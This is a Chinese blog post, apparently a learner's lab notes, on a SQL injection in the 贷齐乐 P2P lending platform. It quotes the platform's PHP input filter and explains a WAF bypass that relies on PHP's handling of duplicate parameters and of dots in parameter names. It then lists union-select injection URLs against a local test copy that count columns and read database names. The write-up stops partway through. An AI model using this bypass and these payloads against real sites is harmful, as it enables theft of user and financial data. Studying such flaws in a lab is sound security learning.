漏洞背景
贷齐乐是一款P2P网贷平台软件
-
SQL注入漏洞:攻击者可以通过特定方式绕过系统的防火墙,直接访问和操控数据库。这意味着他们可以在没有登录的情况下获取敏感数据,如用户信息和交易记录 .
-
加密机制问题:系统的加密设计有缺陷,攻击者可以绕过用户登录验证,直接以任何用户的身份登录。这让他们可以随意访问用户账户,甚至可能控制账户中的资金.
运行代码
这段代码对传入参数进行了两层安全过滤:首先通过dowith_sql防止SQL注入,然后用dhtmlspecialchars防止XSS攻击。代码检查是否存在submit参数,如果存在,就使用id进行数据库查询,否则直接退出。
foreach ($_REQUEST as $key => $value) {
$_REQUEST[$key] = dowith_sql($value);
}
$request_uri = explode("?", $_SERVER['REQUEST_URI']);
if (isset($request_uri[1])) {
$rewrite_url = explode("&", $request_uri[1]);
foreach ($rewrite_url as $key => $value) {
$_value = explode("=", $value);
if (isset($_value[1])) {
$_REQUEST[$_value[0]] = dhtmlspecialchars(addslashes($_value[1]));
}
}
}
通过视频课程以及资料查找注入思路如下
我们想要发送SQL注入的代码到服务器,但又不想让waf发现。解决的办法需要我们绕过waf的检查不要将代码写在请求里,waf会直接识别.我们可以利用PHP的一个特点,当同一个参数名出现多次时,它只会记住最后一个值。于是,我们可以吧代码作为第一个参数值发送,然后再跟一个正常的值。这样,waf可能只看到了那个正常的值,而没注意到前面的代码。还可以利用URL里的点和下划线的关系。在URL中,点(.)在PHP里会被当作下划线(_)来处理。于是,我们可以把参数名稍微变一下,比如用i.d代替i_d.我们还需要确保它能在PHP脚本中被正确地利用。可以用$_SERVER['REQUEST_URI']这个全局变量,它包含了请求的原始URI。去提取出注入的代码.
通过回显判断我的思路,两次联合查询查询到cft
#查询列数
127.0.0.1/daiqile/index.php?
submit=1&i_d=-2/**/union/**/select/**/1,2,3,4&i.d=1
#查询数据库名
127.0.0.1/daiqile/index.php?submit=1&i_d=-2/**/union/**/select/**/1,table_schema,3,4/**/from/**/information_schema.tables/**/limit/**/0,1&i.d=1
#查询结果
127.0.0.1/daiqile/index.php?submit=1&i_d=-2/**/union/**/select/**/1,table_schema,3,4/**/from/**/information_schema.tables/**/limit/**/0,1&i.d=1
后续还没做出来,明天继续.
扫一扫
856
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
